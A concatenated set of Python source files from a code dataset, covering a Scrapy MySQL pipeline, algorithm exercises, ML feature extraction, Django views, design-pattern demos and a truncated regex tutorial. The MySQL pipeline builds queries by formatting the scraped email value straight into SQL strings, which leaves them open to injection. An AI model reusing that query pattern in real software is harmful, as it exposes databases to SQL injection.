URL_REGEX.match(value) else ''\n else:\n item[key] = get_string(value).strip().replace('_', ' ') if value and len(value) > 1 else ''\n return item\n\n\nclass MySQLPipeline(object):\n \"\"\"A pipeline to store the item in a MySQL database.\n This implementation uses Twisted's asynchronous database API.\n \"\"\"\n # insert_query = \"INSERT IGNORE INTO hcpreports (%s) values (%s)\"\n # update_query = \"UPDATE hcpreports SET %s WHERE email='%s'\"\n insert_query = \"INSERT IGNORE INTO {} (%s) values (%s)\".format(settings.get('DB_TABLE'))\n update_query = \"UPDATE {} SET %s WHERE email='%s'\".format(settings.get('DB_TABLE'))\n\n def __init__(self):\n dbargs = settings.get('DB_CONNECT')\n db_server = settings.get('DB_SERVER')\n dbpool = adbapi.ConnectionPool(db_server, **dbargs)\n self.dbpool = dbpool\n\n def __del__(self):\n self.dbpool.close()\n\n def process_item(self, item, spider):\n # run db query in the thread pool\n d = self.dbpool.runInteraction(self._do_upsert, item, spider)\n d.addErrback(self._handle_error, item, spider)\n # at the end return the item in case of success or failure\n d.addBoth(lambda _: item)\n # return the deferred instead the item. This makes the engine to\n # process next item (according to CONCURRENT_ITEMS setting) after this\n # operation (deferred) has finished.\n return d\n\n def _do_upsert(self, conn, item, spider):\n \"\"\"Perform an insert or update.\"\"\"\n conn.execute(\"\"\"SELECT EXISTS(\n SELECT 1 FROM {} WHERE email = '{}'\n )\"\"\".format(settings.get('DB_TABLE'), item[\"email\"]))\n ret = conn.fetchone()[0]\n\n if ret:\n self._update_data(item, self.update_query)\n spider.log(\"Item updated in db: %s %r\" % (item[\"email\"], item))\n else:\n self._insert_data(item, self.insert_query)\n spider.log(\"Item stored in db: %s %r\" % (item[\"email\"], item))\n return item\n\n def _insert_data(self, item, insert):\n keys = item.fields.keys()\n fields = u','.join(keys)\n qm = u','.join([u'%s'] * len(keys))\n sql = insert % (fields, qm)\n data = [item[k] for k in keys]\n return self.dbpool.runOperation(sql, data)\n\n def _update_data(self, item, update):\n keys = item.fields.keys()\n fields = u','.join([\"{}=%s\".format(key) for key in keys if key != \"email\"])\n sql = update % (fields, item[\"email\"])\n data = [item[k] for k in keys if k != \"email\"]\n return self.dbpool.runOperation(sql, data)\n\n def _handle_error(self, failure, item, spider):\n \"\"\"Handle occurred on db interaction.\"\"\"\n # do nothing, just log\n log.err(failure)\n\n def _get_guid(self, item):\n \"\"\"Generates an unique identifier for a given item.\"\"\"\n # hash based solely in the url field\n return md5(item['url']).hexdigest()\n","sub_path":"hcpreports/sweep/sweep/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"210701408","text":"def binary_search(n, m, array, keys):\n result = []\n for key in keys:\n result.append(search_key(array, int(key), 0, n-1))\n return result\n\ndef search_key(array, key, start, end):\n if key == array[(end-start)//2+start]:\n return (end-start)//2 + start + 1\n if start == end:\n return -1\n elif key > array[(end-start)//2+start]:\n start = (end-start)//2 + start + 1\n return search_key(array, key, start, end)\n elif key < array[(end-start)//2+start]:\n end = (end-start)//2 + start\n return search_key(array, key, start, end)\n\nif __name__ == '__main__':\n with open('rosalind_bins.txt') as f:\n data_list = f.read().splitlines()\n n = int(data_list[0])\n m = int(data_list[1])\n array = [int(i) for i in data_list[2].split()]\n keys = [int(i) for i in data_list[3].split()]\n result = [str(i) for i in binary_search(n, m, array, keys)]\n with open('rosalind_bins_result.txt', 'w') as f:\n f.write(' '.join(result))\n","sub_path":"algorithmic_heights/BINS/BINS.py","file_name":"BINS.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109864267","text":"import os\nimport h5py\nimport numpy as np\nimport argparse\nimport json\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.models import Model, load_model \nfrom tensorflow.keras.applications.resnet_v2 import preprocess_input\n\nlabel_list = ['Abyssinian','Bengal','Birman','Bombay','British_Shorthair','Egyptian_Mau','Maine_Coon','Persian','Ragdoll','Russian_Blue','Siamese','Sphynx','american_bulldog','american_pit_bull_terrier','basset_hound','beagle','boxer','chihuahua','english_cocker_spaniel','english_setter','german_shorthaired','great_pyrenees','havanese','japanese_chin','keeshond','leonberger','miniature_pinscher','newfoundland','pomeranian','pug','saint_bernard','samoyed','scottish_terrier','shiba_inu','staffordshire_bull_terrier','wheaten_terrier','yorkshire_terrier']\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-database\", required = True,\n help = \"Path to database which contains images to be indexed\")\nap.add_argument(\"-embedding\", required = True,\n help = \"Name of output embedding\")\nap.add_argument(\"-json\", required = True,\n help = \"Name of json\")\nargs = vars(ap.parse_args())\n\nimport re\n\ndef get_first_digit_pos(s):\n first_digit = re.search('\\d', s)\n return first_digit.start()\n\ndef get_imlist(path):\n return [os.path.join(path,f) for f in os.listdir(path) if f.endswith('.jpg')]\n\nfrom numpy import linalg\ndef extract_from_img(img_path):\n img = image.load_img(img_path, target_size=(224, 224))\n img = image.img_to_array(img)\n img = np.expand_dims(img, axis=0)\n img = preprocess_input(img)\n feat = extract_model.predict(img)\n norm_feat = feat[0] / linalg.norm(feat[0])\n return norm_feat\n\nif __name__ == \"__main__\":\n\n db = args[\"database\"]\n embedding_file = args[\"embedding\"]\n json_file = args[\"json\"]\n img_list = get_imlist(db)\n \n print(\"--------------------------------------------------\")\n print(\" feature extraction starts\")\n print(\"--------------------------------------------------\")\n \n feats = []\n names = []\n labels = []\n\n model = load_model('/home/cyhong021/saved_model/resnet50/model_epoch100_loss0.05_acc1.00.h5')\n \n layer_name = 'dense'\n extract_model = Model(inputs=model.input,\n outputs=model.get_layer(layer_name).output)\n\n for i, img_path in enumerate(img_list):\n norm_feat = extract_from_img(img_path)\n img_name = os.path.split(img_path)[1]\n feats.append(norm_feat)\n names.append(img_name)\n #print(names)\n #print(label_list.index(img_name[:get_first_digit_pos(img_name) - 1]))\n labels.append(label_list.index(img_name[:get_first_digit_pos(img_name) - 1]))\n if i%300 == 0:\n print(\"extracting feature from image No. %d , %d images in total\" %((i+1), len(img_list)))\n\n\n with open(json_file, 'w') as outfile:\n json.dump({'name': names, 'label':labels}, outfile)\n feats = np.array(feats)\n print(feats.shape)\n np.savez(embedding_file, ans=feats)\n \n print(\"--------------------------------------------------\")\n print(\" writing feature extraction results ...\")\n print(\"--------------------------------------------------\")\n\n","sub_path":"deeplearning/network_traninig_withlabel/extract_feature_resnet50.py","file_name":"extract_feature_resnet50.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116814134","text":"import seamless\nimport time\nfrom seamless import cell, context, transformer, macro\nfrom seamless.lib.gui.basic_editor import edit\nfrom seamless.lib.gui.basic_display import display\n\n@macro(\"str\")\ndef construct_silk_model(ctx, mode):\n from seamless import transformer\n params = {\"value\": {\"pin\": \"output\", \"dtype\": \"text\"}}\n if mode == \"array\":\n params[\"N\"] = {\"pin\": \"input\", \"dtype\": \"int\"}\n code = \"\"\"s = SilkModel()\nreturn str(SilkModelArray([s for n in range(N)]))\n\"\"\"\n else:\n code = \"return str(SilkModel())\"\n ctx.transf = transformer(params)\n ctx.transf.code.cell().set(code)\n ctx.registrar.silk.connect(\"SilkModel\", ctx.transf)\n if mode == \"array\":\n ctx.registrar.silk.connect(\"SilkModelArray\", ctx.transf)\n ctx.export(ctx.transf)\n\nctx = context()\nsilk_model = \"\"\"\nType SilkModel {\n Integer a = 1\n Float b = 2.0\n Bool c = True\n String x = \"OK\"\n}\n\"\"\"\nsilk_model2 = \"\"\"\nType SilkModel {\n Integer a = 1\n Float b = 2.0\n Bool c = True\n String x = \"OK2\"\n}\n\"\"\"\n\nctx.silk_model = cell((\"text\", \"code\", \"silk\"))\nctx.silk_model.set(silk_model)\nctx.registrar.silk.register(ctx.silk_model)\n\nctx.n = cell(\"int\").set(3)\nctx.mode = cell(\"str\").set(\"standard\")\nctx.value = cell(\"text\")\nctx.cons = construct_silk_model(ctx.mode)\nctx.cons.value.connect(ctx.value)\nctx._validate_path()\n\nctx.silk_model.set(silk_model2)\n#time.sleep(0.001)\nctx.equilibrate()\nprint(ctx.value.data)\n\nctx.ed_silk_model = edit(ctx.silk_model,\"Silk model\")\nctx._validate_path()\n\nctx.d_value = display(ctx.value,\"Result\")\nctx._validate_path()\n\nctx.mode.set(\"array\")\nctx.n.connect(ctx.cons.N)\n\nimport os\nctx.tofile(os.path.splitext(__file__)[0] + \".seamless\", backup=False)\n","sub_path":"OLD/tests/test-macro.py","file_name":"test-macro.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554380112","text":"# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\n\nimport proto # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v13.enums\",\n marshal=\"google.ads.googleads.v13\",\n manifest={\"ClickTypeEnum\",},\n)\n\n\nclass ClickTypeEnum(proto.Message):\n r\"\"\"Container for enumeration of Google Ads click types.\n \"\"\"\n\n class ClickType(proto.Enum):\n r\"\"\"Enumerates Google Ads click types.\"\"\"\n UNSPECIFIED = 0\n UNKNOWN = 1\n APP_DEEPLINK = 2\n BREADCRUMBS = 3\n BROADBAND_PLAN = 4\n CALL_TRACKING = 5\n CALLS = 6\n CLICK_ON_ENGAGEMENT_AD = 7\n GET_DIRECTIONS = 8\n LOCATION_EXPANSION = 9\n LOCATION_FORMAT_CALL = 10\n LOCATION_FORMAT_DIRECTIONS = 11\n LOCATION_FORMAT_IMAGE = 12\n LOCATION_FORMAT_LANDING_PAGE = 13\n LOCATION_FORMAT_MAP = 14\n LOCATION_FORMAT_STORE_INFO = 15\n LOCATION_FORMAT_TEXT = 16\n MOBILE_CALL_TRACKING = 17\n OFFER_PRINTS = 18\n OTHER = 19\n PRODUCT_EXTENSION_CLICKS = 20\n PRODUCT_LISTING_AD_CLICKS = 21\n SITELINKS = 22\n STORE_LOCATOR = 23\n URL_CLICKS = 25\n VIDEO_APP_STORE_CLICKS = 26\n VIDEO_CALL_TO_ACTION_CLICKS = 27\n VIDEO_CARD_ACTION_HEADLINE_CLICKS = 28\n VIDEO_END_CAP_CLICKS = 29\n VIDEO_WEBSITE_CLICKS = 30\n VISUAL_SITELINKS = 31\n WIRELESS_PLAN = 32\n PRODUCT_LISTING_AD_LOCAL = 33\n PRODUCT_LISTING_AD_MULTICHANNEL_LOCAL = 34\n PRODUCT_LISTING_AD_MULTICHANNEL_ONLINE = 35\n PRODUCT_LISTING_ADS_COUPON = 36\n PRODUCT_LISTING_AD_TRANSACTABLE = 37\n PRODUCT_AD_APP_DEEPLINK = 38\n SHOWCASE_AD_CATEGORY_LINK = 39\n SHOWCASE_AD_LOCAL_STOREFRONT_LINK = 40\n SHOWCASE_AD_ONLINE_PRODUCT_LINK = 42\n SHOWCASE_AD_LOCAL_PRODUCT_LINK = 43\n PROMOTION_EXTENSION = 44\n SWIPEABLE_GALLERY_AD_HEADLINE = 45\n SWIPEABLE_GALLERY_AD_SWIPES = 46\n SWIPEABLE_GALLERY_AD_SEE_MORE = 47\n SWIPEABLE_GALLERY_AD_SITELINK_ONE = 48\n SWIPEABLE_GALLERY_AD_SITELINK_TWO = 49\n SWIPEABLE_GALLERY_AD_SITELINK_THREE = 50\n SWIPEABLE_GALLERY_AD_SITELINK_FOUR = 51\n SWIPEABLE_GALLERY_AD_SITELINK_FIVE = 52\n HOTEL_PRICE = 53\n PRICE_EXTENSION = 54\n HOTEL_BOOK_ON_GOOGLE_ROOM_SELECTION = 55\n SHOPPING_COMPARISON_LISTING = 56\n CROSS_NETWORK = 57\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v13/enums/types/click_type.py","file_name":"click_type.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549246899","text":"from django.views.generic import TemplateView\nfrom money.models import Credit\nfrom money.forms import CreditForm\nfrom django.views import View\nfrom django.shortcuts import redirect\n\n\nclass Home(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(Home, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['credits'] = Credit.objects.filter(user=self.request.user)\n context['form'] = CreditForm()\n else:\n self.template_name = 'login.html'\n context['credits'] = []\n return context\n\n\nclass CreditCreateView(View):\n def post(self, request):\n form = CreditForm(request.POST)\n if form.is_valid():\n form.save()\n print(form.errors)\n return redirect('home')\n\n\nclass DetailsView(TemplateView):\n template_name = 'details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailsView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['total'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(sign=False).values_list('total', flat=True)\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(sign=True).values_list('total', flat=True)\n ),\n }\n context['total']['summary'] = context['total']['plus'] - context['total']['minus']\n\n context['cash'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=0).filter(sign=False).values_list(\n 'total', flat=True\n )\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=0).filter(sign=True).values_list(\n 'total', flat=True\n )\n ),\n }\n context['cash']['summary'] = context['cash']['plus'] - context['cash']['minus']\n\n context['card'] = {\n 'minus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=1).filter(sign=False).values_list(\n 'total', flat=True\n )\n ),\n 'plus': sum(\n Credit.objects.filter(\n user=self.request.user\n ).filter(type=1).filter(sign=True).values_list(\n 'total', flat=True\n )\n ),\n }\n context['card']['summary'] = context['card']['plus'] - context['card']['minus']\n else:\n context['credits'] = []\n return context\n","sub_path":"money/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88132305","text":"import abc\nimport json\nimport xml.etree.ElementTree as et\n\nclass Song:\n def __init__(self, song_id, title, artist):\n self.song_id = song_id\n self.title = title\n self.artist = artist\n\n# Product\nclass Serializer(abc.ABC):\n @abc.abstractmethod\n def serialize(self,song):\n pass\n\n# Concrete Product\nclass JsonSerializer(Serializer):\n def serialize(self,song):\n song_info = {\n 'id': song.song_id,\n 'title': song.title,\n 'artist': song.artist\n }\n return json.dumps(song_info)\n\n# Concrete Product\nclass XmlSerializer(Serializer):\n def serialize(self,song):\n song_info = et.Element('song', attrib={'id': song.song_id})\n title = et.SubElement(song_info, 'title')\n title.text = song.title\n artist = et.SubElement(song_info, 'artist')\n artist.text = song.artist\n return et.tostring(song_info, encoding='unicode')\n\n\n\n# Concrete Creator\nclass SerializeFactory:\n def _get_serializer(self, format):\n if format == 'json':\n return JsonSerializer()\n elif format == 'xml':\n return XmlSerializer()\n else:\n raise ValueError(format)\n\n\nsong = Song('1', 'Song name', 'Song Artist')\n\nfactory = SerializeFactory()\njson_serializer = factory._get_serializer('json')\nxml_serializer = factory._get_serializer('xml')\n\nprint(json_serializer.serialize(song))\nprint(xml_serializer.serialize(song))","sub_path":"FactoryPattern/solution/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98732131","text":"# Linear Solution\nclass Solution:\n def hIndex(self, citations: List[int]) -> int:\n if citations == None or len(citations) == 0:\n return 0\n n = len(citations)\n for i in range(n):\n diff = n - i\n if citations[i] >= diff:\n return diff\n return 0\n\n# Time Complexity: O(n)\n# Space Complexity: O(1)\n\n# Binary Search Solution\nclass Solution:\n def hIndex(self, citations: List[int]) -> int:\n if citations == None or len(citations) == 0:\n return 0\n n = len(citations)\n low = 0\n high = n - 1\n while low <= high:\n mid = low + (high - low) // 2\n if citations[mid] == n - mid:\n return n - mid\n elif citations[mid] < n - mid:\n low = mid + 1\n else:\n high = mid - 1\n return n - low\n# Time Complexity: O(log(n))\n# Space Complexity: O(1)\n\n\n","sub_path":"Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328853227","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport os, sys\n\n\n# size = 192, 192\n# size = 96, 96\n# size = 128, 128\n# size = 64, 64\nsize = 192\nsize = 96\nsize = 128\nsize = 64\n\nexts = [\".jpg\", \".png\", \".gif\", \"jpeg\"]\n\nclip = {}\n\nopened = open('fileboat.nogit.txt')\nscan_path, files = eval(opened.read())\nprint(len(files), \"total files\")\nopened.close()\n\n\nprint(len(files))\n\nfiles = [a for a in files if a[0][-4:].lower() in exts]\n\nprint(len(files))\n\n\n# height = size[1]*len(files)\nheight = size[1]*1000\n\ncalc_size = (size[0], height)\nprint(calc_size)\n\nfrom math import sqrt\n\nmosaic_size = int(sqrt(len(files)))*size\nmosaic = Image.new('RGB', calc_size)\n\n\n# exit()\n\nfor i,tup in enumerate(files):\n try:\n basename, filename, filesize, abspath = tup\n if filename[-4:] not in exts:\n print(\"skipping\", filename)\n continue\n im = Image.open(filename)\n im.thumbnail(size)\n ext = ''\n\n if filename[-4:] == \".png\" or filename[-4:] == \".gif\":\n ext = \"PNG\"\n else:\n ext = \"JPEG\"\n # special case for gif folder with those .jpg named gif (wtf again!?)\n if len(sys.argv)>1: ext = \"PNG\"\n new_size = im.size\n \n clip[filename] = [i,list(new_size)]\n mosaic.paste(im,(0,i*size[1]))\n\n print(40*' ', '\\r', filename, 'done')\n if i >1000: break\n except Exception as exc:\n print(filename, filename[-4:], exc)\n\nif os.path.isfile('mosaic.jpg'):\n os.remove('mosaic.jpg')\nmosaic.save('mosaic.jpg')\nopen('mosaic.txt','w').write(repr(clip))","sub_path":"_projects/fileboat/mosaic-maker-vertical.py","file_name":"mosaic-maker-vertical.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"654149106","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import learning_curve\r\n\r\n\r\nclass Helper(object):\r\n\r\n @staticmethod\r\n def augment(X):\r\n if X.ndim == 1:\r\n return np.concatenate((X, [1]))\r\n else:\r\n pad = np.ones((1, X.shape[1]))\r\n return np.concatenate((X, pad), axis=0)\r\n\r\n @staticmethod\r\n def onehot_decode(X):\r\n return np.argmax(X, axis=0)\r\n\r\n @staticmethod\r\n def onehot_encode(L, c):\r\n if isinstance(L, int):\r\n L = [L]\r\n n = len(L)\r\n out = np.zeros((c, n))\r\n out[L, range(n)] = 1\r\n return np.squeeze(out)\r\n\r\n @staticmethod\r\n def plot_output(X, Y):\r\n plt.scatter(X, Y)\r\n plt.show()\r\n\r\n @staticmethod\r\n def plot_validation_curve(alphas, train_error, validation_error):\r\n plt.subplot(2, 1, 1)\r\n plt.semilogx(alphas, train_error[0], label='Train')\r\n plt.semilogx(alphas, validation_error[0], label='Test')\r\n # i_alpha_optim = np.argmax(validation_error)\r\n # alpha_optim = alphas[i_alpha_optim]\r\n # plt.vlines(alpha_optim, plt.ylim()[0], np.max(validation_error), color='k',\r\n # linewidth=3, label='Optimum on test')\r\n plt.legend(loc='lower left')\r\n plt.ylim([0, 1.2])\r\n plt.xlabel('Regularization parameter')\r\n plt.ylabel('Score')\r\n plt.show()\r\n\r\n @staticmethod\r\n def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None, n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):\r\n plt.figure()\r\n plt.title(title)\r\n if ylim is not None:\r\n plt.ylim(*ylim)\r\n plt.xlabel(\"Training examples\")\r\n plt.ylabel(\"Score\")\r\n train_sizes, train_scores, test_scores = learning_curve(\r\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\r\n train_scores_mean = np.mean(train_scores, axis=1)\r\n train_scores_std = np.std(train_scores, axis=1)\r\n test_scores_mean = np.mean(test_scores, axis=1)\r\n test_scores_std = np.std(test_scores, axis=1)\r\n plt.grid()\r\n\r\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\r\n train_scores_mean + train_scores_std, alpha=0.1,\r\n color=\"r\")\r\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\r\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\r\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\r\n label=\"Training score\")\r\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\r\n label=\"Cross-validation score\")\r\n\r\n plt.legend(loc=\"best\")\r\n plt.show()","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491218985","text":"\nfrom django.contrib import admin \nfrom django.urls import path \nfrom django.conf import settings \nfrom django.conf.urls.static import static \nfrom . import views\nfrom .views import *\n\nurlpatterns = [\n path('',views.home,name='home'),\n\tpath('login/',views.loginPage,name='login'),\n\tpath('logout/',views.logoutUser,name='logout'),\n\tpath('register/',views.register,name='register'),\n\tpath('profile//',views.profile,name='profile'),\n\tpath('gallery/',views.gallery,name='gallery'),\n\tpath('gallery_search/',views.gallery,name='gallery_search'),\n\tpath('canvas/',views.canvas,name='canvas'),\n\tpath('tutorial/',views.tutorial,name='tutorial'),\n\tpath('index/',views.index,name='index'),\n\tpath('edit_profile/',views.edit_profile,name='edit_profile'),\n\tpath('like/', views.like, name='like'),\n\tpath('favorite/', views.favorite, name='favorite'),\n\tpath('comicpage///',views.comicpage,name='comicpage'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","sub_path":"Skribbly/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276838335","text":"from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou\nimport torch\nimport numpy as np\nfrom sklearn.metrics import average_precision_score\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\ndef eval_part(dataset, predictions, qdataset, query_predictions, output_folder, logger, query_pad_by_gt=None):\n # predictions\n # results_dict.update({img_id: result for img_id, result in zip(image_ids, output)}\n\n\n det_thresh = 0.5\n\n name_to_det_feat = {}\n\n FEAT_DIM = predictions[0].get_field(\"embeds\").size(1)\n n_parts = predictions[0].get_field(\"part_embeds\").size(1) // FEAT_DIM - 1\n\n logger.info(\n \"Dimension of Global Feature: \" + str(FEAT_DIM)\n )\n logger.info(\n \"Number of Local Features: \" + str(n_parts)\n )\n\n print('Processing name_to_det_feat...')\n for image_id, prediction in enumerate(predictions):\n name = dataset.frame[image_id]\n gt_bboxlist = dataset.get_groundtruth(image_id)\n\n img_info = dataset.get_img_info(image_id)\n width = img_info['width']\n height = img_info['height']\n\n prediction = prediction.resize((width, height))\n det = np.array(prediction.bbox)\n det_feat_g = prediction.get_field(\"embeds\")\n det_feat_part = prediction.get_field(\"part_embeds\")\n\n det_feat = torch.cat([det_feat_g, (1./n_parts)*det_feat_part], dim=1)\n det_feat = np.array(det_feat)\n\n pids = np.array(gt_bboxlist.get_field(\"ids\"))\n\n # CHECK\n #print(prediction.get_field(\"scores\").shape)\n scores = np.array(prediction.get_field(\"scores\"))\n inds = np.where(scores>=det_thresh)[0]\n\n if len(inds) > 0:\n name_to_det_feat[name] = (det[inds, :], det_feat[inds, :], pids)\n\n\n q_feat = []\n q_id = []\n q_imgname = []\n print('FOWARD QUERY...')\n for image_id, qpred in enumerate(query_predictions):\n\n gt_bboxlist = qdataset.get_groundtruth(image_id)\n\n qids = qpred.get_field(\"ids\")\n qfeat_g = qpred.get_field(\"embeds\")\n qfeat_part = qpred.get_field(\"part_embeds\")\n qfeat = torch.cat([qfeat_g, (1./n_parts)*qfeat_part], dim=1)\n qimgname = qpred.get_field(\"imgname\")\n \n q_feat.append(qfeat)\n q_id.extend(list(qids))\n q_imgname.extend(list(qimgname))\n\n q_feat = np.concatenate(q_feat, axis=0)\n q_id = np.array(q_id)\n q_imgname = np.array(q_imgname)\n\n\n aps = []\n accs = []\n topk = [1, 5, 10]\n\n for i in tqdm(range(q_feat.shape[0])):\n\n y_true, y_score = [], []\n imgs, rois = [], []\n count_gt, count_tp = 0, 0\n\n feat_p = q_feat[i, :]\n probe_imgname = qdataset.frame[q_imgname[i]]\n\n \n probe_pid = q_id[i]\n\n probe_gts = {}\n\n for image_id in range(len(dataset)):\n gt_bboxlist = dataset.get_groundtruth(image_id)\n name = dataset.frame[image_id]\n\n gt_ids = gt_bboxlist.get_field(\"ids\")\n if probe_pid in gt_ids and name != probe_imgname:\n loc = np.where(gt_ids==probe_pid)[0]\n probe_gts[name] = np.array(gt_bboxlist.bbox)[loc]\n\n\n for image_id in range(len(dataset)):\n gallery_imgname = dataset.frame[image_id]\n if gallery_imgname == probe_imgname:\n continue\n count_gt += (gallery_imgname in probe_gts)\n\n if gallery_imgname not in name_to_det_feat:\n continue\n\n det, feat_g, pids_g = name_to_det_feat[gallery_imgname]\n sim = np.dot(feat_g, feat_p).ravel()\n label = np.zeros(len(sim), dtype=np.int32)\n\n if gallery_imgname in probe_gts:\n gt = probe_gts[gallery_imgname].ravel()\n w, h = gt[2] - gt[0], gt[3] - gt[1]\n\n iou_thresh = min(0.5, (w*h*1.0)/((w+10)*(h+10)))\n inds = np.argsort(sim)[::-1]\n sim = sim[inds]\n det = det[inds]\n\n for j, roi in enumerate(det[:, :]):\n if compute_iou(roi, gt) >= iou_thresh:\n label[j] = 1\n count_tp += 1\n break\n\n y_true.extend(list(label))\n y_score.extend(list(sim))\n\n\n y_score = np.asarray(y_score)\n y_true = np.asarray(y_true)\n recall_rate = count_tp*1.0/count_gt\n ap = 0 if count_tp == 0 else average_precision_score(y_true, y_score)*recall_rate\n aps.append(ap)\n\n inds = np.argsort(y_score)[::-1]\n y_score = y_score[inds]\n y_true = y_true[inds]\n accs.append([min(1, sum(y_true[:k])) for k in topk])\n\n mAP = np.mean(aps)\n accs_ = np.mean(accs, axis=0)\n \n log_result = 'Result: \\nmAP: {:.2%}\\n'.format(mAP)\n for i, k in enumerate(topk):\n log_result += ('top-{:2d} = {:.2%}\\n'.format(k, accs_[i]))\n # print('top-{:2d} = {:.2%}'.format(k, accs_[i]))\n logger.info(log_result)\n\n return\n\ndef compute_iou(box1, box2):\n # (4, )\n # (xmin, ymin, xmax, ymax)\n w = min(box1[2], box2[2]) - max(box1[0], box2[0])\n h = min(box1[3], box2[3]) - max(box1[1], box2[1])\n if w <= 0 or h <= 0:\n return 0\n area1 = (box1[2]-box1[0])*(box1[3]-box1[1])\n area2 = (box2[2]-box2[0])*(box2[3]-box2[1])\n cross = w*h\n return cross/(area1+area2-cross)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"maskrcnn_benchmark/data/datasets/eval_part.py","file_name":"eval_part.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456396539","text":"import re\n\n\ndef nocoes_basicas():\n print(\"\\nNoções Básicas\")\n string = 'Testando expressões regulares em Python'\n print(re.findall(r'regulares', string)) # Função que retorna todas as ocorrências de 'teste' dentro da string\n print(re.sub(r'regulares', 'ABC', string)) # Função que substitui 'regulares' por 'ABC' dentro da string\n print(re.search(r'regulares', string)) # Função que retorna instancia de Match se\n # capturar alguma palavra válida, ou None se não achar\n\n regex = re.compile(r'teste') # O Python precisa sempre compilar uma nova expressão regular,\n # mas ao usar compile, ele compila ela e depois não precisa compilar de novo\n\n\ndef meta_caracteres():\n # \\ - Usada para escapar caracteres reservados\n # | - Ou\n # . - Qualquer caractere (com exceção de quebra de linha)\n # [] - Dentro dos colchetes são colocados caracteres, é aceito pela regex qualquer caractere dentro dos colchetes\n # ^ - Indica o início da string\n # $ - Indica o fim da string\n frase = 'Python python'\n\n print(\"\\nMeta Caracteres\")\n print(re.findall(r'Python|python', frase)) # Aceita 'Python' ou 'python'\n print(re.findall(r'..thon', frase)) # Aceita qualquer palavra com 'thon' sucedido de dois caracteres qualquer\n print(re.findall(r'[Pp]ython', frase)) # Aceita palavras que comecem com 'P' ou 'p' e terminam com 'ython'\n print(re.findall(r'^[Pp]ython', frase)) # Aceita 'Python' ou 'python' se estiver no começo da string\n print(re.findall(r'[Pp]ython$', frase)) # Aceita 'Python' ou 'python' se estiver no fim da string\n\n\ndef quantificadores():\n # Quantificadores: Ditam quantas vezes tal cadeia de caracteres deve aparecer\n # * - 0 ou n\n # + - 1 ou n\n # ? - 0 ou 1\n # {} - Qualquer range desejado\n frase = 'goooooooooool gl'\n\n print(\"\\nQuantificadores\")\n print(re.findall(r'go*l', frase)) # Palavras que começam com g, terminam com l e tem 0 ou n 'o' entre 'g' e 'l'\n print(re.findall(r'go+l', frase)) # 